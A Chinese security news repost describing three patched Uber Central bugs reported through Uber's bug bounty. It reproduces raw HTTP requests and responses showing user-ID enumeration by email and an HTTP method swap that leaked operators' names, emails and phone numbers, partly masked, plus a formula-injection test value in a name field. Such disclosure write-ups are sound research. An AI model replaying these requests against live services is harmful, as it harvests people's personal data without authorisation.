• 欢迎访问安全专题网站,安全专题信息,安全专题教程,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入安全专题 QQ群
  • 安全专题现已支持滚动公告栏功能,兼容其他浏览器,看到的就是咯,在后台最新消息那里用li标签添加即可。
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏安全专题吧

Uber修复三个漏洞,白帽子获数千美金奖励(含漏洞分析)

安全事件 aqzt 1年前 (2016-12-19) 225次浏览 0个评论

安全专家 Kevin Roh 在 Uber 的在线 APP Uber Central 中发现三个漏洞,可造成用户数据泄露。Uber 及时修复了这三个漏洞,并在 Uber 的漏洞赏金计划下奖励 Kevin Roh 数千美金。

Uber Central

Uber Central服务于今年 7 月推出,这款在线 APP 允许企业同时为多位客户量身定制网约车,从预约、管理到支付实施全方位监控。

Uber Central 在使用时,可以让每个用户的单一账户在同一时间同时管理多项出行任务,并且可以对 Uber 中提供的车辆服务(比如 UberX 或 UberBlack)进行选择。除了 App 之外,Uber Central 也推出了浏览器的版本,企业可以通过浏览器界面一次呼叫多台 Uber 车辆,并且Uber Central支持短信发送旅途信息,以此来顾全没有使用智能手机的顾客。

Uber 修复三个漏洞,白帽子获数千美金奖励(含漏洞分析)

三个漏洞

0×01 通过邮箱地址枚举 userUUID

由于 Uber Central 管理员要将一个已注册的用户升级为操着者(通常是企业员工)只能通过其注册邮箱地址。

因此他构造了一个简单的服务请求:

POST /admin/api/organizations/[organizationUUID]/operators HTTP/1.1

Host: central.uber.com

Connection: close

Content-Length: 40

Accept: application/json

Origin: https://central.uber.com

x-csrf-token: XXXX

x-uber-origin: web-central-admin

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Content-Type: application/json

Referer: https://central.uber.com/admin/locations

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.8

Cookie: _ua=XXXX

{"operatorEmail":"r****@unlv.nevada.edu"}

在服务请求中,如果该邮箱已经被使用,那么我们就可以看到该用户的 UUID

服务器回应:

HTTP/1.1 200 OK

Server: nginx

Date: Mon, 05 Sep 2016 01:12:15 GMT

Content-Type: application/json; charset=utf-8

Connection: close

X-Frame-Options: SAMEORIGIN

X-XSS-Protection: 1; mode=block

x-csrf-token: XXXX

Set-Cookie: web-central-admin:sess=fNlg1atG-0-XXXX path=/; expires=Tue, 06 Sep 2016 00:40:29 GMT; httponly

X-Uber-App: web-central-admin

Strict-Transport-Security: max-age=0

X-Content-Type-Options: nosniff

Strict-Transport-Security: max-age=2592000

X-Frame-Options: SAMEORIGIN

Cache-Control: max-age=0

Content-Length: 348

{"data":{"operatorEmail":"r****@unlv.nevada.edu","organizationUuid":"[organizationUUID]","userUuid":"72225a84-53c4-4766-9ca1-6eec06cbaa13"},"createOperator":{"uuid":"9987c0ca-0894-4992-810b-0da64b6a53fc","userUUID":"906d29c8-7b17-4e90-900e-1af72e1c72a6","firstName":null,"lastName":null,"email":null,

"phoneNumber":null,"branches":null}}

得到了邮箱为 r**@unlv.nevada.edu 的用户,他的 UUID 是906d29c8-7b17-4e90-900e-1af72e1c72a6

攻击者可以编写一个简单的脚本,尝试“operationEmail”参数所有可能的值,枚举出用户的邮箱以及 UUID。

0×02 通过 GET 请求枚举 userUUID

第二个漏洞和第一个的漏洞产生的效果相同,不同之处就是将 POST 请求改为 GET 请求。

GET 请求:

GET /admin/api/organizations/[organizationUUID]/operators HTTP/1.1

Host: central.uber.com

Connection: close

Content-Length: 34

Origin: https://central.uber.com

x-csrf-token: XXXX

x-uber-origin: web-central-admin

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36

Content-Type: application/json

Accept: application/json

Referer: https://central.uber.com/admin/locations

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.8

Cookie: _ua=XXXX

{"operatorEmail":"test2@test.com"}

服务器回应:

HTTP/1.1 200 OK

Server: nginx

Date: Tue, 18 Oct 2016 22:44:58 GMT

Content-Type: application/json; charset=utf-8

Connection: close

X-Frame-Options: SAMEORIGIN

X-XSS-Protection: 1; mode=block

Set-Cookie: web-central-admin:sess=XXXX

X-Uber-App: web-central-admin

Strict-Transport-Security: max-age=0

X-Content-Type-Options: nosniff

Strict-Transport-Security: max-age=2592000

X-Frame-Options: SAMEORIGIN

Cache-Control: max-age=0

Content-Length: 2801

{"data":{"organizationUuid":"[organizationUUID]","userUuid":"72225a84-53c4-4766-9ca1-6eec06cbaa13"},"operatorsForOrg":{"organization":{"uuid":"[organizationUUID]","name":"rohk","u4bUUID":null,"businessType":"Hospitality","estimatedDailyTrips":"500+","estimatedBranchCount":"1-5","state":"APPROVED"},"operators":{"688f8c6e-e323-4750-97b4-86656a8a2644":{"uuid":"688f8c6e-e323-4750-97b4-86656a8a2644","userUUID":"72225a84-53c4-4766-9ca1-6eec06cbaa13","firstName":"KEVIN","lastName":"ROH","email":"rohkroh@gmail.com","phoneNumber":"XXXX"},"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405":{"uuid":"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405","userUUID":"59a95100-5be4-4df8-a6e8-a180ec29036e","firstName":null,"lastName":null,"email":"p***@unlv.nevada.edu","phoneNumber":null},"276c9b65-7d85-4500-bc62-daf9a3d211e4":{"uuid":"276c9b65-7d85-4500-bc62-daf9a3d211e4","userUUID":"de483ca6-43bf-4930-bfe3-e3312d1fe478","firstName":null,"lastName":null,"email":"ch*****@gmail.com","phoneNumber":null},"c449f804-b905-4cfb-aa73-9c1e36e1512a":{"uuid":"c449f804-b905-4cfb-aa73-9c1e36e1512a","userUUID":"8de8282e-0d11-4d9d-938b-fbd19b826703","firstName":null,"lastName":null,"email":"test@test.com","phoneNumber":null},"f198e728-f4a2-487a-a6ee-3c9e4e4621b2":{"uuid":"f198e728-f4a2-487a-a6ee-3c9e4e4621b2","userUUID":"e71f3f9f-784c-4cba-9d76-d4f110e090e2","firstName":null,"lastName":null,"email":"test2@test.com","phoneNumber":null},"fba45580-c36e-460b-a55d-198f8bd82d6e":{"uuid":"fba45580-c36e-460b-a55d-198f8bd82d6e","userUUID":"d9f142b2-1f91-49ae-a7a7-feadcdfa1375","firstName":null,"lastName":null,"email":"em***@outlook.com","phoneNumber":null},"3a3b2393-7f89-45b7-a558-98b8f117fe46":{"uuid":"3a3b2393-7f89-45b7-a558-98b8f117fe46","userUUID":"5e699c04-d453-4dab-9e32-90c6a610c4c3","firstName":null,"lastName":null,"email":"kr****@live.com","phoneNumber":null},"9987c0ca-0894-4992-810b-0da64b6a53fc":{"uuid":"9987c0ca-0894-4992-810b-0da64b6a53fc","userUUID":"906d29c8-7b17-4e90-900e-1af72e1c72a6","firstName":"test","lastName":"account","email":"r****@unlv.nevada.edu","phoneNumber":"XXXX"}},"operatorsLinkStatusAndRoles":{"688f8c6e-e323-4750-97b4-86656a8a2644":{"linkStatus":"LINKED","roles":["ADMIN","USER"]},"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405":{"linkStatus":"PENDING","roles":["USER"]},"276c9b65-7d85-4500-bc62-daf9a3d211e4":{"linkStatus":"PENDING","roles":["USER"]},"c449f804-b905-4cfb-aa73-9c1e36e1512a":{"linkStatus":"PENDING","roles":["USER"]},"f198e728-f4a2-487a-a6ee-3c9e4e4621b2":{"linkStatus":"PENDING","roles":["USER"]},"fba45580-c36e-460b-a55d-198f8bd82d6e":{"linkStatus":"PENDING","roles":["USER"]},"3a3b2393-7f89-45b7-a558-98b8f117fe46":{"linkStatus":"PENDING","roles":["USER"]},"9987c0ca-0894-4992-810b-0da64b6a53fc":{"linkStatus":"LINKED","roles":["USER"]}}}}

Uber 修复了这个漏洞,邮箱地址不再与用户的 userUUID 相关联,但是每当你发出 GET 请求时,依然能得到一个随机的 userUUID(窃笑)。

0×03 获取更多的信息

在获取了大量的可用邮箱及其 userUUID 之后,就可以通过 GET HTTP 的方式尝试获取更多的数据。一旦用户已经被升级为操作者,也就是那些已经注册了 Uber Central 的企业用户,他们的信息就存在被泄露的威胁,包括姓名、电话号码、邮箱、userUUID。

原始的 HTTP 路径的是 PUT,如果当你能够把 PUT 改为 GET 的话,更多的信息将暴露出来。

GET 请求:

GET /admin/api/organizations/[organizationUUID]/branches/8c744451-3e3e-43c3-aaaf-2bf52feab19c/operators HTTP/1.1

Host: central.uber.com

Connection: close

Content-Length: 331

Accept: application/json

Origin: https://central.uber.com

x-csrf-token: XXXX

x-uber-origin: web-central-admin

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36

Content-Type: application/json

Referer: https://central.uber.com/admin/locations

Accept-Encoding: gzip, deflate, sdch, br

Accept-Language: en-US,en;q=0.8

Cookie: _ua=XXXX

{"operatorUuids":["9987c0ca-0894-4992-810b-0da64b6a53fc","688f8c6e-e323-4750-97b4-86656a8a2644","e13a4bd3-21e4-4dae-b1cc-84b4e6de7405","c449f804-b905-4cfb-aa73-9c1e36e1512a","fba45580-c36e-460b-a55d-198f8bd82d6e","3a3b2393-7f89-45b7-a558-98b8f117fe46","276c9b65-7d85-4500-bc62-daf9a3d211e4","f198e728-f4a2-487a-a6ee-3c9e4e4621b2"]}

服务器回应:

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 21 Oct 2016 00:43:48 GMT

Content-Type: application/json; charset=utf-8

Connection: close

X-Frame-Options: SAMEORIGIN

X-XSS-Protection: 1; mode=block

Set-Cookie: web-central-admin:XXXX

X-Uber-App: web-central-admin

Strict-Transport-Security: max-age=0

X-Content-Type-Options: nosniff

Strict-Transport-Security: max-age=2592000

X-Frame-Options: SAMEORIGIN

Cache-Control: max-age=0

Content-Length: 2851

{"data":{"branchUuid":"8c744451-3e3e-43c3-aaaf-2bf52feab19c","userUuid":"72225a84-53c4-4766-9ca1-6eec06cbaa13"},"operatorsForOrg":{"branch":{"uuid":"8c744451-3e3e-43c3-aaaf-2bf52feab19c","name":"","phoneNumber":"+XXXX","address":"XXXX","email":""},"operators":{"688f8c6e-e323-4750-97b4-86656a8a2644":{"uuid":"688f8c6e-e323-4750-97b4-86656a8a2644","userUUID":"72225a84-53c4-4766-9ca1-6eec06cbaa13","firstName":"KEVIN","lastName":"ROH","email":"rohkroh@gmail.com","phoneNumber":"XXXX"},"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405":{"uuid":"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405","userUUID":"59a95100-5be4-4df8-a6e8-a180ec29036e","firstName":"Ted","lastName":"Pele","email":"p***@unlv.nevada.edu","phoneNumber":null},"9987c0ca-0894-4992-810b-0da64b6a53fc":{"uuid":"9987c0ca-0894-4992-810b-0da64b6a53fc","userUUID":"906d29c8-7b17-4e90-900e-1af72e1c72a6","firstName":"test","lastName":"account","email":"r****@unlv.nevada.edu","phoneNumber":"XXXX"},"c449f804-b905-4cfb-aa73-9c1e36e1512a":{"uuid":"c449f804-b905-4cfb-aa73-9c1e36e1512a","userUUID":"8de8282e-0d11-4d9d-938b-fbd19b826703","firstName":"AndrewTEST","lastName":"Test","email":"test@test.com","phoneNumber":"XXXX"},"f198e728-f4a2-487a-a6ee-3c9e4e4621b2":{"uuid":"f198e728-f4a2-487a-a6ee-3c9e4e4621b2","userUUID":"e71f3f9f-784c-4cba-9d76-d4f110e090e2","firstName":"uber","lastName":"uber","email":"test2@test.com","phoneNumber":"XXXX"},"fba45580-c36e-460b-a55d-198f8bd82d6e":{"uuid":"fba45580-c36e-460b-a55d-198f8bd82d6e","userUUID":"d9f142b2-1f91-49ae-a7a7-feadcdfa1375","firstName":"h1","lastName":"emckai","email":"em****@outlook.com","phoneNumber":null},"3a3b2393-7f89-45b7-a558-98b8f117fe46":{"uuid":"3a3b2393-7f89-45b7-a558-98b8f117fe46","userUUID":"5e699c04-d453-4dab-9e32-90c6a610c4c3","firstName":"=HYPERLINK(/"http://google.com/")","lastName":"","email":"kr******@live.com","phoneNumber":null},"276c9b65-7d85-4500-bc62-daf9a3d211e4":{"uuid":"276c9b65-7d85-4500-bc62-daf9a3d211e4","userUUID":"de483ca6-43bf-4930-bfe3-e3312d1fe478","firstName":"XXXXX","lastName":"XXXXX","email":"ch******@gmail.com","phoneNumber":"XXXX"}},"operatorsLinkStatusAndRoles":{"688f8c6e-e323-4750-97b4-86656a8a2644":{"linkStatus":"LINKED","roles":["ADMIN","USER"]},"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405":{"linkStatus":"PENDING","roles":["USER"]},"9987c0ca-0894-4992-810b-0da64b6a53fc":{"linkStatus":"LINKED","roles":["USER"]},"c449f804-b905-4cfb-aa73-9c1e36e1512a":{"linkStatus":"PENDING","roles":["USER"]},"f198e728-f4a2-487a-a6ee-3c9e4e4621b2":{"linkStatus":"PENDING","roles":["USER"]},"fba45580-c36e-460b-a55d-198f8bd82d6e":{"linkStatus":"PENDING","roles":["USER"]},"3a3b2393-7f89-45b7-a558-98b8f117fe46":{"linkStatus":"PENDING","roles":["USER"]},"276c9b65-7d85-4500-bc62-daf9a3d211e4":{"linkStatus":"PENDING","roles":["USER"]}}}}

上面的回应中显示了几个用户的姓、名、电话号码、邮箱地址以及他们的 userUUID。

Uber 修复了这个漏洞,firstName,lastName,phoneNumber 的位置都被替换成了 NULL,但是每当你发出 GET 请求时,依然能得到一个随机的 userUUID(再次窃笑)。

Roh 在他的博客中阐述了了他对于漏洞所做的测试。

* 参考来源:affairs,FB 小编 bimeover 编译,转载请注明来自FreeBuf.COM 


Selinux 中国 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:Uber 修复三个漏洞,白帽子获数千美金奖励(含漏洞分析)
喜欢 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址